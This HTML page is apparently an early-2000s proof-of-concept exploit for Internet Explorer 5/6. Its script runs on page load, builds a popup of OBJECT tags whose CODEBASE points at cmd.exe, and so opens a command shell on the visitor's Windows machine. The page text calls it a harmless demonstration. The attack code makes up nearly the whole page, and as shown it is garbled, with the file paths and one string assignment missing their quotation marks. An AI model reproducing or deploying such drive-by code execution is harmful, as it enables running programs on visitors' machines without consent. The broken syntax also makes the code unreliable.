<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:#222222;background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>

var programName=new Array(
c:/windows/system32/cmd.exe,
c:/winnt/system32/cmd.exe,
c:/cmd.exe
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html=;
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME=X CLASSID=CLSID:11111111-1111-1111-1111-111111111111 CODEBASE="+programName[n]+" %1=r></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}

</SCRIPT>
</head>
<BODY onload="Init()">
<H1>Hmm, lets start a command shell...</H1>
<p>
This page doesnt do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
</BODY>
</HTML>